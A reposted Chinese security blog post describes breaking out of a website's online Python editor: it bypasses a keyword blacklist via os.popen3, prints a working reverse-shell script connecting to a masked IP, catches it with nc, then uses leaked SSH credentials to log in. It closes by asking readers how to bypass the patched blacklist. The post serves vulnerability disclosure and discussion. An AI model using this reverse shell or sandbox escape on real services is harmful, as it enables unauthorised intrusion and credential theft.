Python在线编程的安全问题

admin 2022年5月12日12:25:52安全开发评论10 views577字阅读1分55秒阅读模式

看到某公众号提供"Python在线编写"功能,于是测试了几个函数.
以下常规的都被过滤了

os.systemos.popen subprocess commands

然后试试os.popen2/3/4发现可以import,同时socket也可以使用

这样就写了个反弹shell的脚本:

import socketfrom os import popen3  s = socket.socket() s.connect(('xx.xx.xx.xx', 12345))for i in range(10000):     ans = popen3(s.recv(1024))     s.send(ans[1].read() + ans[2].read())

敲进去

Python在线编程的安全问题


这边用nc监听,拿到shell


Python在线编程的安全问题


发现敏感文件,验证了一下是ssh的密码,登入之后就可以执行交互式的命令了


Python在线编程的安全问题


帐号权限比较低,不过还是有些信息泄漏


Python在线编程的安全问题


看到服务器的源码,针对用户输入采用黑名单过滤.这样的in判断直接编码一下就能绕过。


Python在线编程的安全问题




以上漏洞已被修复,网站的维护人员把os.popenXeval open( 都加入了上面的黑名单,那么问题来了:


以该黑名单的判断方式,现在怎么绕过?

你认为关于该类线上编程服务安全性的解决方案是什么呢?


点击原文可以跳转到该网站进行测试。

欢迎留言及回复交流。

原文始发于微信公众号(乐枕迭代日志):Python在线编程的安全问题

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日12:25:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Python在线编程的安全问题 http://cn-sec.com/archives/943654.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: